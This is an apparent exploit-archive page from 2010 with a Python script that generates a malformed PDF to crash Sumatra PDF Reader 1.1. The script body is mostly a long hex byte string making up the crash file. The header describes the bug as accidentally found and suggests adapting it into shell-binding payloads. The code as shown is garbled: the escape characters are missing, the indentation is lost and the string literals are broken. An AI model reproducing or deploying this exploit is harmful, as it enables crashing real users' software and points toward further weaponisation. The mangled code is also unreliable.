Home / os / win7

sumatrapdf-dos.txt

Posted on 01 July 2010

###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
#         Vulnerability Detection Time : 21st June 2010, 1:13 AM          #
#	    Tested on version 1.1 of Sumara PDF Reader                      #
#         Nature : Accidental Discovery                                   #
###########################################################################
# Description : Sumatra PDF Reader crashed while testing recovered PDF    #
#               Files from a HardDisk. PDF Files recovered using Forensic #
#               Tools were large in size. DoS code has been optimised to  #
#               implement the crash with reduced file-size.               #
# Notes : This source can be modified after analyzing the crash appcompat #
#         files to write shell bind / other payloaded exploits.           #
#         Sumatra PDR Reader crashed when  PDF Files were already         #
#         associated to launch it.
#                                                                         #
# Thanks to Felicity. Hope you got your files back :-)                    #
###########################################################################
# Vulnerability Discoverer : Azim Poonawala [ QUAKERDOOMER ]              #
# Email : quakerdoomer [ @ ] fmguy.com                                    #
###########################################################################
###########################################################################


#!/usr/bin/python
# Usage: python sumatra_pdf_v1.1_DoS_file.py

data = (
"x25x50x44x46x2Dx31x2Ex34x0Dx25xE2xE3xCFxD3x0Dx0A" +
"x36x20x30x20x6Fx62x6Ax3Cx3Cx2Fx48x5Bx36x37x36x20" +
"x31x35x37x5Dx2Fx4Cx69x6Ex65x61x72x69x7Ax65x64x20" +
"x31x2Fx45x20x31x34x38x30x32x2Fx4Cx20x31x38x37x31" +
"x39x2Fx4Ex20x31x2Fx4Fx20x39x2Fx54x20x31x38x35x35" +
"x33x3Ex3Ex0Dx65x6Ex64x6Fx62x6Ax0Dx20x20x20x20x20" +
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20" +
"x20x20x0Dx0Ax78x72x65x66x0Dx0Ax36x20x31x39x0Dx0A" +
"x30x30x30x30x30x30x30x30x31x36x20x30x30x30x30x30" +
"x20x6Ex0Dx0Ax30x30x30x30x30x30x30x38x33x33x20x30" +
"x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x30x36" +
"x37x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30" +
"x30x30x30x39x30x39x20x30x30x30x30x30x20x6Ex0Dx0A" +
"x30x30x30x30x30x30x31x30x33x38x20x30x30x30x30x30" +
"x20x6Ex0Dx0Ax30x30x30x30x30x30x31x32x32x39x20x30" +
"x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x31x36" +
"x38x36x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30" +
"x30x30x32x30x39x30x20x30x30x30x30x30x20x6Ex0Dx0A" +
"x30x30x30x30x30x30x32x31x32x34x20x30x30x30x30x30" +
"x20x6Ex0Dx0Ax30x30x30x30x30x30x32x31x36x38x20x30" +
"x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x33x39" +
"x34x30x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30" +
"x30x30x34x33x33x30x20x30x30x30x30x30x20x6Ex0Dx0A" +
"x30x30x30x30x30x30x36x39x39x39x20x30x30x30x30x30" +
"x20x6Ex0Dx0Ax30x30x30x30x30x30x37x37x35x39x20x30" +
"x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x30x37x39" +
"x39x38x20x30x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30" +
"x30x30x38x32x34x33x20x30x30x30x30x30x20x6Ex0Dx0A" +
"x30x30x30x30x30x30x38x34x39x38x20x30x30x30x30x30" +
"x20x6Ex0Dx0Ax30x30x30x30x30x31x31x34x30x32x20x30" +
"x30x30x30x30x20x6Ex0Dx0Ax30x30x30x30x30x31x34x37" +
"x32x36x20x30x30x30x30x30x20x6Ex0Dx0Ax74x72x61x69" +
"x6Cx65x72x0Dx0Ax3Cx3Cx2Fx53x69x7Ax65x20x32x35x2F" +
"x50x72x65x76x20x31x38x35x34x33x2Fx52x6Fx6Fx74x20" +
"x37x20x30x20x52x2Fx49x6Ex66x6Fx20x35x20x30x20x52" +
"x2Fx49x44x5Bx3Cx33x64x32x38x34x30x64x30x39x37x36" +
"x61x37x66x32x61x37x30x34x31x37x32x36x65x37x30x38" +
"x33x38x31x62x30x3Ex3Cx65x39x35x37x38x32x63x37x34" +
"x36x62x38x34x39x34x64x39x62x39x37x31x33x30x38x37" +
"x31x38x33x36x62x34x39x3Ex5Dx3Ex3Ex0Dx0Ax73x74x61" +
"x72x74x78x72x65x66x0Dx0Ax30x0Dx0Ax25x25x45x4Fx46" +
"x0Dx0Ax20x20x20x20x20x20x20x20x20x20x20x20x20x20" +
"x20x20x0Dx0Ax38x20x30x20x6Fx62x6Ax3Cx3Cx2Fx4Cx65" +
"x6Ex67x74x68x20x38x30x2Fx46x69x6Cx74x65x72x2Fx46" +
"x6Cx61x74x65x44x65x63x6Fx64x65x2Fx4Cx20x39x30x2F" +
"x53x20x34x30x3Ex3Ex73x74x72x65x61x6Dx0Dx0Ax78xDA" +
"x62x60x60x10x60x60x60xFAxC0x20x04x66xAEx0CxA8x80" +
"x19x88x59x18x38x16x80xD5xC0x81x20x03x8CxAFxC4xC0" +
"xC3xFAx61xAEx54x61x11x03x03x57xCExC2x94x25x9BxAE" +
"xF1x5CxB8xCCx7BxDBxECxECx02x2DxB0x3Cx23x03x83xA5" +
"x29x90x66x02x62x0Bx80x20x03x20x10xE9x0DxCEx0Dx0A" +
"x65x6Ex64x73x74x72x65x61x6Dx0Dx65x6Ex64x6Fx62x6A" +
"x0Dx37x20x30x20x6Fx62x6Ax3Cx3Cx2Fx50x61x67x65x73" +
"x20x33x20x30x20x52x2Fx54x79x70x65x2Fx43x61x74x61" +
"x6Cx6Fx67x2Fx50x61x67x65x4Cx61x62x65x6Cx73x20x31" +
"x20x30x20x52x2Fx4Dx65x74x61x64x61x74x61x20x34x20" +
"x30x20x52x3Ex3Ex0Dx65x6Ex64x6Fx62x6A"
);

try:
f1 = open("SumatraPDF_Reader_1.1_crasher_DoS.pdf","w")
f1.write(data)
f1.close()
print("
PDF file created ! : [SumatraPDF_Reader_1.1_crasher_DoS.pdf]
Launch it to run under Sumatra PDF Reader v1.1 to test crash.

NOTE : Launching Sumatra PDF Reader and then using File/Open Ctrl+O to open
this file WON'T cause a DoS
")
print("Written by : Azim Poonawala (QUAKERDOOMER) [ quakerdoomer [ @ ] fmguy.com ]
		http:/solidmecca.co.nr
		http://winautopwn.co.nr
		http://my.opera.com/quakerdoomer");
except:
print "Error"

 

TOP

Malware :

Exploits :